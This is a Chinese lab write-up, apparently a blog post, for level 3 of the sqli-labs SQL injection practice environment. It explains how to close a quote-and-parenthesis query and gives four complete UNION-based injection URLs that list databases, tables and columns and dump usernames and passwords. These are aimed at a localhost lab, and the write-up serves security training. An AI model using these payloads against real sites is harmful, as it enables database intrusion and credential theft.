zoukankan      html  css  js  c++  java
  • sqli-libs(3)

    今天我们来讲解 sqli-libs(3)

    有括号的单引号报错  首先我们来查看加入'看报错了 在加‘’ 没报错 证明 存在注入

    然后我们看加入’的报错回显的是什么

    和我们的sqli-libs(1)的报错对比一下

    发现多了一个)证明他的语句变成了 id=那我们可以根据此特性构造闭合语句

    我们查看源代码 发现确实是多了 括号的 我们此时在构造id=1')闭合前面的括号和引号 而后面的直接用%23闭合就行了

    了解了语句构造方法后 我们开始执行我们的命令了

    0x01爆数据库名称 和当前数据库

    http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23

    这里我们知道我们的当前数据库所以就不进行爆破了

    0x02爆表名

    http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%23

    0x03爆列名

    http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%23

    0x04爆字段名

    http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,group_concat(username,0x3a,password)%20from%20users%23

    其实在sql前面的关卡 只要你找到绕过思路 后面那些语句都是一样的 所以主要是思路

    切记 少就是多 慢就是快

  • 相关阅读:
    Android入门第六篇之ListView (一)
    mysql触发器的作用及语法
    查询记录时rs.previous()的使用
    Microsoft Visual C++ Runtime Library Runtime Error的解决的方法
    Ubuntu中编译链接Opencv应用的简便方式
    24点经典算法
    CMS系统简介(从简介到使用)
    编程学习资源
    Django是什么
    Thinkphp中的自动验证
  • 原文地址:https://www.cnblogs.com/-zhong/p/10887474.html
Copyright © 2011-2022 走看看